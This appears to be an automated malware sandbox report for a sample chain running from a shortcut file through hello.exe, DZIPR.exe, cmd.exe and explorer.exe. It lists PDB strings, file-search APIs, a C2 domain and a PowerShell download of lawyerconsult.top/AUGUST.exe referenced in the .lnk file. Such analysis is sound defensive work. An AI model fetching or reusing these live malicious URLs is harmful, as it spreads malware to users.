                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,11_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,11_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,12_2_6FE2748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,13_2_6C91748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,19_2_6FEA748E
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: fullimmersion777.com
                      Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive
                      Source: DZIPR.exe.12.drString found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: lawyerconsult.top
                      Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                      Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: edb.log.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: MdkbG2pK4l.lnkString found in binary or memory: http://lawyerconsult.top/AUGUST.exe
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 